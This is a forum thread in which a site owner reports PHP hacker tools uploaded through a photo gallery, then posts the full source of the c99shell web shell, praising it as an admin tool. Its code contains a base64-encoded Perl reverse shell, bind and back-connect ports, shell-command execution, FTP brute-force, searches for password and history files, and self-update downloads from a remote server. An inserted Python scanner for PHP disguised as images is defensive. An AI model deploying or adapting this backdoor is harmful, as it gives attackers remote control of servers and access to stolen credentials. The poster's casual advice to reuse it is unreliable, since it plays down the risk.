Hacking? What are these PHP files uploaded to my site for?

Marsh Posté on 16-11-2007 at 16:28:54

Hello!

Files were uploaded to my site via the Coppermine gallery.

xxx

Too late, I'm removing the links and the files.
I tested them, and they are real hacker tools for taking more-than-total control of a site, or even of the server if it isn't secured!

In any case, well done to whoever made this, because technically I have never been able to find software this complete and effective for managing a site online!
(You can even send an email to the people who made it, a Russian team...)

It's great, you can do everything with it, I've been looking for this for so long! (to administer my site simply)

Of course it's less cool when it's a hacker using it on someone else's site,
but I can still use them for myself, lol!

PS: both are recognised as Trojan horses by antivirus software since they use backdoors and other security holes... not gooood! It's a pain to calm the antivirus down, but oh well ^^

For those interested in seeing well-written PHP code, or even in getting the files, I won't be selfish and I'm putting the code here;
for more information contact the Russian team... everything is in the files! (in English, though)

Message edited by le_phoenix on 16-11-2007 at 19:54:20

Marsh Posté on 16-11-2007 at 16:49:21

NOD32 gives me this for your jpg:
16/11/2007 16:47:53 HTTP filter file http://www.all-crash.fr/galerie/al [...] sp_php.jpg PHP/Hacktool.Haxplorer.B trojan connection terminated - quarantined  Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
 
:heink: :heink: :heink:


---------------
We deserve everything that's coming...
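
The situation in this thread, PHP tools uploaded through the gallery under image names and flagged by an antivirus on access, can be triaged on the server by scanning the upload directory for PHP code behind media or text extensions. This is an added example, not part of any post in the thread; the extension list, the marker patterns and the sample files (constructed in a temporary directory) are assumptions made for the illustration.

```python
"""Triage an upload directory for PHP code stored under media or text names."""
import re
import tempfile
from pathlib import Path

# Magic bytes expected for the image types a gallery stores
# (the extension list is an assumption for this example).
MEDIA_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
TEXT_EXTS = {".txt"}

PHP_OPEN = re.compile(rb"<\?php", re.I)
# Calls that run commands or evaluate code at run time.
EXEC_CALL = re.compile(
    rb"\b(eval|exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)
# Decoders commonly wrapped around an embedded payload.
DECODE_CALL = re.compile(rb"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I)
# Hard-coded remote endpoints the script could contact.
REMOTE_URL = re.compile(rb"\b(?:https?|ftp)://[A-Za-z0-9.-]+", re.I)


def _tags(prefix, pattern, data, group):
    """Turn every regex hit into a lower-case 'prefix:value' tag."""
    return {prefix + m.group(group).decode("ascii").lower()
            for m in pattern.finditer(data)}


def scan_bytes(name, data):
    """Return a sorted list of finding tags for one uploaded file."""
    ext = Path(name).suffix.lower()
    findings = set()
    magics = MEDIA_MAGIC.get(ext)
    # An image extension whose content does not start with the image header.
    if magics and not data.startswith(magics):
        findings.add("magic-mismatch")
    if PHP_OPEN.search(data):
        # PHP source where only media or plain text is expected.
        if magics or ext in TEXT_EXTS:
            findings.add("php-in-non-php-file")
        findings |= _tags("exec:", EXEC_CALL, data, 1)
        findings |= _tags("decode:", DECODE_CALL, data, 1)
        findings |= _tags("url:", REMOTE_URL, data, 0)
    return sorted(findings)


def scan_tree(root, max_bytes=2_000_000):
    """Scan every file under root; return {relative path: findings}."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            with path.open("rb") as fh:
                findings = scan_bytes(path.name, fh.read(max_bytes))
            if findings:
                report[path.relative_to(root).as_posix()] = findings
    return report


def write_constructed_samples(root):
    """Create constructed sample uploads (inert test data, not real files)."""
    albums = Path(root) / "albums"
    albums.mkdir()
    # Genuine JPEG header followed by filler: must not be reported.
    (albums / "holiday.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 64)
    # PHP source saved under an image name ($blob is never defined).
    (albums / "photo_php.jpg").write_bytes(
        b'<?php $u = "http://update.example.invalid/"; '
        b"eval(base64_decode($blob)); ?>")
    # Valid GIF header with PHP appended after the image bytes.
    (albums / "avatar.gif").write_bytes(
        b"GIF89a" + b"\x00" * 16 + b"<?php passthru($cmd); ?>")
    # Ordinary text upload: must not be reported.
    (Path(root) / "notes.txt").write_bytes(b"plain upload notes\n")


def demo():
    """Run the scan over the constructed samples and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        write_constructed_samples(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings)
```

Any hit in a directory that should only hold images means the file must not be served through the PHP interpreter; the `url:` tags list the remote hosts hard-coded in the script, which is the first thing to review when asking whether a file contacts the outside.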

Marsh Posté on 16-11-2007 at 16:53:02

Here is the "Trojan Horse PHP/BackDoor.C99Shell" (aptly named), which turns out to be a superb site administration tool! (it was in a txt file uploaded by an anonymous user to my site)
I would just like to be sure that it doesn't send information to the outside: can someone check that?

[cpp]<?php
//Starting calls
ini_set("max_execution_time",0);
if (!function_exists("getmicrotime" )) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
$adires="";
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips" )) {function strips(&$arr,$k="" ) {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS" ) {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

 

$shver = "1.0 pre-release build #16"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl" ); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}

 

$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.

 

if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING" )) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\" ) as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
 $surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);

 

$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.

 

//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

 

$host_allow = array("*" ); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1" )
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";

 

$gzipencode = TRUE; //Encode with gzip?

 

$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)

 

$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server

 

$filestealth = TRUE; //if TRUE, don't change modify- and access-time

 

$donated_html = "<center><b>C </b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array("" ); //array ("act1","act2,"...), if $act is in this array, display $donated_html.

 

$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT" );
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)

 

$log_email = "user@host.tld"; //Default e-mail for sending logs

 

$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.

 

// Registered file-types.
//  array(
//   "{action1}"=>array("ext1","ext2","ext3",...),
//   "{action2}"=>array("ext4","ext5","ext6",...),
//   ...
//  )
$ftypes  = array(
 "html"=>array("html","htm","shtml" ),
 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess" ),
 "exe"=>array("sh","install","bat","cmd" ),
 "ini"=>array("ini","inf" ),
 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl" ),
 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg" ),
 "sdb"=>array("sdb" ),
 "phpsess"=>array("sess" ),
 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar" )
);

 

// Registered executable file-types.
//  array(
//   string "command{i}"=>array("ext1","ext2","ext3",...),
//   ...
//  )
//   {command}: %f% = filename
$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
if (empty($dizin)) {$dizin = realpath("." );} elseif(realpath($dizin)) {$dizin = realpath($dizin);}
$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;}
$dizin = str_replace("\\\\","\\",$dizin);
$dizinispd = htmlspecialchars($dizin);
/*dizin*/
$real = realpath($dizinispd);
$path = basename ($PHP_SELF);
function dosyayicek($link,$file)
{
   $fp = @fopen($link,"r" );
   while(!feof($fp))
   {
       $cont.= fread($fp,1024);
   }
   fclose($fp);

 

  $fp2 = @fopen($file,"w" );
   fwrite($fp2,$cont);
   fclose($fp2);
}

  


$exeftypes  = array(
 getenv("PHPRC" )." -q %f%" => array("php","php3","php4" ),
 "perl %f%" => array("pl","cgi" )
);

 

/* Highlighted files.
  array(
   i=>array({regexp},{type},{opentag},{closetag},{break})
   ...
  )
  string {regexp} - regular exp.
  int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
  string {opentag} - open html-tag, e.g. "<b>" (default)
  string {closetag} - close html-tag, e.g. "</b>" (default)
  bool {break} - if TRUE and found match then break
*/
$regxp_highlight  = array(
  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>" ), // example
  array("config.php",1) // example
);

 

$safemode_diskettes = array("a" ); // This variable for disabling diskett-errors.
 // array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z" );
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line

 

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

 

$bindport_pass = "c99";  // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

 

// Command-aliases
if (!$win)
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "ls -la" ),
  array("find all suid files", "find / -type f -perm -04000 -ls" ),
  array("find suid files in current dir", "find . -type f -perm -04000 -ls" ),
  array("find all sgid files", "find / -type f -perm -02000 -ls" ),
  array("find sgid files in current dir", "find . -type f -perm -02000 -ls" ),
  array("find config.inc.php files", "find / -type f -name config.inc.php" ),
  array("find config* files", "find / -type f -name \"config*\"" ),
  array("find config* files in current dir", "find . -type f -name \"config*\"" ),
  array("find all writable folders and files", "find / -perm -2 -ls" ),
  array("find all writable folders and files in current dir", "find . -perm -2 -ls" ),
  array("find all service.pwd files", "find / -type f -name service.pwd" ),
  array("find service.pwd files in current dir", "find . -type f -name service.pwd" ),
  array("find all .htpasswd files", "find / -type f -name .htpasswd" ),
  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd" ),
  array("find all .bash_history files", "find / -type f -name .bash_history" ),
  array("find .bash_history files in current dir", "find . -type f -name .bash_history" ),
  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc" ),
  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc" ),
  array("list file attributes on a Linux second extended file system", "lsattr -va" ),
  array("show opened ports", "netstat -an | grep -i listen" )
 );
}
else
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "dir" ),
  array("show opened ports", "netstat -an" )
 );
}

 

$sess_cookie = "c99shvars"; // Cookie-variable name

 

$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting

 

//Quick launch
$quicklaunch = array(
 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)" ),
 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)" ),
 array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort" ),
 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","" ),
 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d" ),
 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d" ),
 array("<b>Encoder</b>",$surl."act=encoder&d=%d" ),
 array("<b>Tools</b>",$surl."act=tools&d=%d" ),
 array("<b>Proc.</b>",$surl."act=processes&d=%d" ),
 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d" ),
 array("<b>Sec.</b>",$surl."act=security&d=%d" ),
 array("<b>SQL</b>",$surl."act=sql&d=%d" ),
 array("<b>PHP-code</b>",$surl."act=eval&d=%d" ),
 array("<b>Update</b>",$surl."act=update&d=%d" ),
 array("<b>Feedback</b>",$surl."act=feedback&d=%d" ),
 array("<b>Self remove</b>",$surl."act=selfremove" ),
 array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()" )
);

 

//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";

 

@$f = $_REQUEST["f"];
@extract($_REQUEST["c99shcook"]);

 

//END CONFIGURATION

 


// \/Next code isn't for editing\/
function ex($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r" )))
  {
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 return $res;
}
function which($pr)
{
$path = ex("which $pr" );
if(!empty($path)) { return $path; } else { return $pr; }
}

 

function cf($fname,$text)
{
 $w_file=@fopen($fname,"w" ) or err(0);
 if($w_file)
 {
 @fputs($w_file,@base64_decode($text));
 @fclose($w_file);
 }
}
function err($n,$txt='')
{
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';    
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '</b></div></font></td></tr></table>';
return null;
}
@set_time_limit(0);
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp)." )$!i";
if (!preg_match($s,getenv("REMOTE_ADDR" )) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR" )))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR" )." ) not allow" );}
if (!empty($login))
{
 if (empty($md5_pass)) {$md5_pass = md5($pass);}
 if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
 {
  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"" );
  header("HTTP/1.0 401 Unauthorized" );
  exit($accessdeniedmess);
 }
}
if ($act != "img" )
{
$lastdir = realpath("." );
chdir($curdir);
if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
$sess_data = unserialize($_COOKIE["$sess_cookie"]);
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}

 

$disablefunc = @ini_get("disable_functions" );
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}

 

if (!function_exists("c99_buff_prepare" ))
{
function c99_buff_prepare()
{
 global $sess_data;
 global $act;
 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 $sess_data["copy"] = array_unique($sess_data["copy"]);
 $sess_data["cut"] = array_unique($sess_data["cut"]);
 sort($sess_data["copy"]);
 sort($sess_data["cut"]);
 if ($act != "copy" ) {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
}
}
c99_buff_prepare();
if (!function_exists("c99_sess_put" ))
{
function c99_sess_put($data)
{
 global $sess_cookie;
 global $sess_data;
 c99_buff_prepare();
 $sess_data = $data;
 $data = serialize($data);
 setcookie($sess_cookie,$data);
}
}
foreach (array("sort","sql_sort" ) as $v)
{
 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
}
if ($sort_save)
{
 if (!empty($sort)) {setcookie("sort",$sort);}
 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}
if (!function_exists("str2mini" ))
{
function str2mini($content,$len)
{
 if (strlen($content) > $len)
 {
  $len = ceil($len/2) - 2;
  return substr($content, 0,$len)."...".substr($content,-$len);
 }
 else {return $content;}
}
}
if (!function_exists("view_size" ))
{
function view_size($size)
{
 if (!is_numeric($size)) {return FALSE;}
 else
 {
  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  else {$size = $size . " B";}
  return $size;
 }
}
}
if (!function_exists("fs_copy_dir" ))
{
function fs_copy_dir($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($o = readdir($h)) !== FALSE)
 {
  if (($o != "." ) and ($o != ".." ))
  {
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return TRUE;
}
}
if (!function_exists("fs_copy_obj" ))
{
function fs_copy_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_copy_dir($d,$t);
 }
 elseif (is_file($d)) {return copy($d,$t);}
 else {return FALSE;}
}
}
if (!function_exists("fs_move_dir" ))
{
function fs_move_dir($d,$t)
{
 $h = opendir($d);
 if (!is_dir($t)) {mkdir($t);}
 while (($o = readdir($h)) !== FALSE)
 {
  if (($o != "." ) and ($o != ".." ))
  {
   $ret = TRUE;
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return TRUE;
}
}
if (!function_exists("fs_move_obj" ))
{
function fs_move_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_move_dir($d,$t);
 }
 elseif (is_file($d))
 {
  if(copy($d,$t)) {return unlink($d);}
  else {unlink($t); return FALSE;}
 }
 else {return FALSE;}
}
}
if (!function_exists("fs_rmdir" ))
{
function fs_rmdir($d)
{
 $h = opendir($d);
 while (($o = readdir($h)) !== FALSE)
 {
  if (($o != "." ) and ($o != ".." ))
  {
   if (!is_dir($d.$o)) {unlink($d.$o);}
   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  }
 }
 closedir($h);
 rmdir($d);
 return !is_dir($d);
}
}
if (!function_exists("fs_rmobj" ))
{
function fs_rmobj($o)
{
 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
 if (is_dir($o))
 {
  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  return fs_rmdir($o);
 }
 elseif (is_file($o)) {return unlink($o);}
 else {return FALSE;}
}
}
if (!function_exists("myshellexec" ))
{
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec" ) and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system" ) and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru" ) and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r" )))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
}
if (!function_exists("tabsort" )) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
if (!function_exists("view_perms" ))
{
function view_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$type = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 else {$type = "?";}

 

$owner["read"] = ($mode & 00400)?"r":"-";
 $owner["write"] = ($mode & 00200)?"w":"-";
 $owner["execute"] = ($mode & 00100)?"x":"-";
 $group["read"] = ($mode & 00040)?"r":"-";
 $group["write"] = ($mode & 00020)?"w":"-";
 $group["execute"] = ($mode & 00010)?"x":"-";
 $world["read"] = ($mode & 00004)?"r":"-";
 $world["write"] = ($mode & 00002)? "w":"-";
 $world["execute"] = ($mode & 00001)?"x":"-";

 

if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x" )?"s":"S";}
 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x" )?"s":"S";}
 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x" )?"t":"T";}

 

return $type.join("",$owner).join("",$group).join("",$world);
}
}
if (!function_exists("posix_getpwuid" ) and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
if (!function_exists("posix_getgrgid" ) and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
if (!function_exists("posix_kill" ) and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
if (!function_exists("parse_perms" ))
{
function parse_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$t = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 else {$t = "?";}
 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
}
}
if (!function_exists("parsesort" ))
{
function parsesort($sort)
{
 $one = intval($sort);
 $second = substr($sort,-1);
 if ($second != "d" ) {$second = "a";}
 return array($one,$second);
}
}
if (!function_exists("view_perms_color" ))
{
function view_perms_color($o)
{
 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
}
}
if (!function_exists("c99getsource" ))
{
function c99getsource($fn)
{
 global $c99sh_sourcesurl;
 $array = array(
  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
 );
 $name = $array[$fn];
 if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
 else {return FALSE;}
}
}
if (!function_exists("c99sh_getupdate" ))
{
function c99sh_getupdate($update = TRUE)
{
 $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0" )."&";
 $data = @file_get_contents($url);
 if (!$data) {return "Can't connect to update-server!";}
 else
 {
  $data = ltrim($data);
  $string = substr($data,3,ord($data{2}));
  if ($data{0} == "\x99" and $data{1} == "\x01" ) {return "Error: ".$string; return FALSE;}
  if ($data{0} == "\x99" and $data{1} == "\x02" ) {return "You are using latest version!";}
  if ($data{0} == "\x99" and $data{1} == "\x03" )
  {
   $string = explode("\x01",$string);
   if ($update)
   {
    $confvars = array();
    $sourceurl = $string[0];
    $source = file_get_contents($sourceurl);
    if (!$source) {return "Can't fetch update!";}
    else
    {
     $fp = fopen(__FILE__,"w" );
     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
